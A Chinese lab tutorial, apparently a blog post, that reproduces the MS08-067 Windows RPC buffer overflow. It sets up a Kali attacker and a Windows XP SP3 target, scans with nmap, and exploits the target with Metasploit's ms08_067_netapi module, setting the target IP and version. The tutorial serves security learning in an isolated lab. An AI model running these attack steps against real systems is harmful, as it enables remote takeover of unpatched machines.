MS08-067漏洞复现

前言

漏洞描述:

        Microsoft Windows Server服务RPC请求缓冲区溢出漏洞Windows的Server服务在处理特质RPC请求时存在缓冲区溢出漏洞,远程攻击者可以通过发送恶意的RPC请求触发这个溢出,导致完全入侵用户系统,SYSTEM权限执行任意指令。对于Windows 2000、XP和Server 2003,无需认证便可以利用该漏洞;对于Windows Vista和Server 2008,可能需要认证。

       kali下载:Kali Linux | Penetration Testing and Ethical Hacking Linux Distribution

       Windows xp下载:https://pan.baidu.com/s/13wyedDfuZdgkjgYgVCnYTA?pwd=csb6 
        提取码:csb6 

        备用windows xp下载:MSDN, 我告诉你 - 做一个安静的工具站(此站系统可能已修复此漏洞)

1、环境搭建

kali进入管理员用户:sudo su默认密码为:kali(密码不可见)

攻击机kali IP:192.168.13.128 

查询方法:终端输入指令ifconfig

靶机Windows xp SP3 IP:192.168.13.132

查询方法:win+r输入cmd打开命令窗口输入ipconfig

查询两台主机是否互通:用kali 输入 ping 192.168.13.132 -c 4

-c 4:4次测试后停止

2、信息收集

使用nmap工具扫描目标机端口

代码:nmap -A -T4 -sV 192.168.13.132

  -A 选项用于使用进攻性(Aggressive)方式扫描;

  -T4 指定扫描过程使用的时序(Timing),T4表示快速扫描。

  总共有6个级别(0-5),级别越高,速度越快,但也容易被防火墙发现;

   -sV:获取对应端口上更为详细的服务版本信息


 

可以看到开放的端口有445、139、443等等,操作系统为Windows xp等信息。

3、漏洞利用

尝试利用ms08-067漏洞使用软件Metasploit

Metasploit是一个开源的渗透测试框架软件,也是一个逐步发展成熟的漏洞研究与渗透代码开发平台,此外也将成为支持整个渗透测试过程的安全技术集成开发与应用环境。

打开msf软件命令:msfconsole

查找ms08-067攻击载荷

使用攻击载荷:use 0 或use exploit/windows/smb/ms08_067_netapi

查看必选配置项(Required为yes为必选配置)

配置目标IP:set rhosts 192.168.13.132

查询系统版本对应编号:show targets

我们的靶机系统是Windows xp sp3所以选择7

配置目标系统版本:set target 7

配置攻击载荷

启动程序:run或exploit

4、后渗透攻击

输入?查看我们能干什么

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值